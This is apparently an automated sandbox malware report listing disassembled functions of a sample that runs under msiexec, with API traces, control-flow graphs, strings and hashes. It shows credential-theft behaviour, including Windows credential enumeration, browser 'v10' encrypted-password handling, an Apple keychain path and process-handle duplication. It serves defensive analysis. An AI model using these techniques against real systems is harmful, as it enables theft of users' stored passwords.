                                                                                                                                                control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 354->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 372 40dff8-40dffb 370->372 373 40defd-40df02 370->373 371->370 374 40ded0-40dee1 _wcsicmp 371->374 372->363 375 40dffd-40e006 372->375 376 40df08 373->376 377 40dfef-40dff2 CloseHandle 373->377 374->370 374->375 375->362 375->363 378 40df0b-40df10 376->378 377->372 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                • API String ID: 708747863-3398334509
                                                                                                                                                • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 649 413e79-413e9d call 413959 call 413ca4 643->649 650 413e28-413e35 643->650 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 free 644->647 651 413edb-413ee2 646->651 647->651 663 413ea2-413eae CloseHandle 649->663 654 413e61-413e68 650->654 655 413e37-413e44 GetModuleHandleW 650->655 656 413ee4 651->656 657 413ee7-413efe 651->657 654->649 660 413e6a-413e76 654->660 655->654 659 413e46-413e5c GetProcAddress 655->659 656->657 657->639 659->654 660->649 663->642
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                                                                • memset.MSVCRT ref: 00413D7F
                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                • memset.MSVCRT ref: 00413E07
                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                • free.MSVCRT ref: 00413EC1
                                                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                • API String ID: 1344430650-1740548384
                                                                                                                                                • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                                Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3473537107-0
                                                                                                                                                • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                  • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                • free.MSVCRT ref: 00418803
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1355100292-0
                                                                                                                                                • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileFind$FirstNext
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1690352074-0
                                                                                                                                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0041898C
                                                                                                                                                • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InfoSystemmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3558857096-0
                                                                                                                                                • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 6 4455a8-4455e3 memset call 403988 wcsrchr 3->6 7 4457fb 3->7 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 15 4455e5 6->15 16 4455e8-4455f9 6->16 10 445800-445809 7->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 43 445823-445826 14->43 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 51 445879-44587c 18->51 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 79 445685 21->79 80 4456b2-4456b5 call 40b1ab 21->80 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 141 44592d-445945 call 40b6ef 24->141 142 44594a 24->142 45 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->45 46 445b29-445b32 28->46 146 4459d0-4459e8 call 40b6ef 29->146 147 4459ed 29->147 30->21 39 445609-44560d 30->39 31->30 39->21 49 44560f-445641 call 4087b3 call 40a889 call 4454bf 39->49 40->3 41->40 52 44584c-445854 call 40b1ab 43->52 53 445828 43->53 184 445b08-445b15 call 40ae51 45->184 54 445c7c-445c85 46->54 55 445b38-445b96 memset * 3 46->55 157 445665-445670 call 40b1ab 49->157 158 445643-445663 call 40a9b5 call 4087b3 49->158 67 4458a2-4458aa call 40b1ab 51->67 68 44587e 51->68 52->13 69 44582e-445847 call 40a9b5 call 4087b3 53->69 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 70 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->70 71 445b98-445ba0 55->71 84 445fae-445fb2 63->84 85 445d2b-445d3b 63->85 163 445cf5 64->163 164 445cfc-445d03 64->164 67->19 77 445884-44589d call 40a9b5 call 4087b3 68->77 144 445849 69->144 247 445c77 70->247 71->70 78 445ba2-445bcf call 4099c6 call 445403 call 445389 71->78 149 44589f 77->149 78->54 94 44568b-4456a4 call 40a9b5 call 4087b3 79->94 111 4456ba-4456c4 80->111 99 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 85->99 100 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 85->100 151 4456a9-4456b0 94->151 169 445d67-445d6c 99->169 170 445d71-445d83 call 445093 99->170 194 445e17 100->194 195 445e1e-445e25 100->195 124 4457f9 111->124 125 4456ca-4456d3 call 413cfa call 413d4c 111->125 124->7 177 4456d8-4456f7 call 40b2cc call 413fa6 125->177 141->142 142->23 144->52 146->147 147->28 149->67 151->80 151->94 157->111 158->157 163->164 174 445d05-445d13 164->174 175 445d17 164->175 179 445fa1-445fa9 call 40b6ef 169->179 170->84 174->175 175->63 208 4456fd-445796 memset * 4 call 409c70 * 3 177->208 209 4457ea-4457f7 call 413d29 177->209 179->84 198 445b17-445b27 call 40aebe 184->198 199 445aa3-445ab0 call 40add4 184->199 194->195 200 445e27-445e59 call 40b2cc call 409d1f call 409b98 195->200 201 445e6b-445e7e call 445093 195->201 198->46 199->184 223 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 199->223 242 445e62-445e69 200->242 243 445e5b 200->243 222 445f67-445f99 call 40b2cc call 409d1f call 409b98 201->222 208->209 246 445798-4457ca call 40b2cc call 409d1f call 409b98 208->246 209->10 222->84 254 445f9b 222->254 223->184 242->201 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->209 264 4457cc-4457e5 call 4087b3 246->264 247->54 265 445f4d-445f5a call 40ae51 248->265 254->179 264->209 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->222 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004455C2
                                                                                                                                                • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                • memset.MSVCRT ref: 0044570D
                                                                                                                                                • memset.MSVCRT ref: 00445725
                                                                                                                                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                  • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                  • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                • memset.MSVCRT ref: 0044573D
                                                                                                                                                • memset.MSVCRT ref: 00445755
                                                                                                                                                • memset.MSVCRT ref: 004458CB
                                                                                                                                                • memset.MSVCRT ref: 004458E3
                                                                                                                                                • memset.MSVCRT ref: 0044596E
                                                                                                                                                • memset.MSVCRT ref: 00445A10
                                                                                                                                                • memset.MSVCRT ref: 00445A28
                                                                                                                                                • memset.MSVCRT ref: 00445AC6
                                                                                                                                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                • memset.MSVCRT ref: 00445B52
                                                                                                                                                • memset.MSVCRT ref: 00445B6A
                                                                                                                                                • memset.MSVCRT ref: 00445C9B
                                                                                                                                                • memset.MSVCRT ref: 00445CB3
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                • memset.MSVCRT ref: 00445B82
                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                • memset.MSVCRT ref: 00445986
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                • API String ID: 2263259095-3798722523
                                                                                                                                                • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                                Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                • API String ID: 2744995895-28296030
                                                                                                                                                • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                                Function 0040B6EF Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 388fileCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040B71C
                                                                                                                                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                • memset.MSVCRT ref: 0040B756
                                                                                                                                                • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                • memset.MSVCRT ref: 0040B851
                                                                                                                                                • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                • memset.MSVCRT ref: 0040BB53
                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                                                                • String ID: chp$v10
                                                                                                                                                • API String ID: 4290143792-2783969131
                                                                                                                                                • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                                                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                                                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                                                Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
